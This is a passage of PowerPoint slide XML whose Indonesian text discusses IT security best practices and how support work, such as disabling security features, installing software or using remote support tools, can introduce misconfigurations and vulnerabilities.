              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login default, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengaudit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, minimal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melonggarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengisolasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terduga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendesak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilewati</a:t>
            </a:r>
